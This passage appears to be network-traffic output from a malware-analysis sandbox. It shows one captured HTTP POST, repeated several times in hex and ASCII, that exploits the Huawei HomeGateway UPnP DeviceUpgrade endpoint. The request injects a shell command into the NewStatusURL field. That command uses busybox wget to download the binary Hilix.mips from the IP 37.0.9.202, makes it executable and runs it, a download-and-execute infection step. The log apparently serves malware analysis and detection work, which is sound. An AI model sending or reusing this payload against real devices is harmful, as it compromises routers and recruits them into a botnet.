/tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
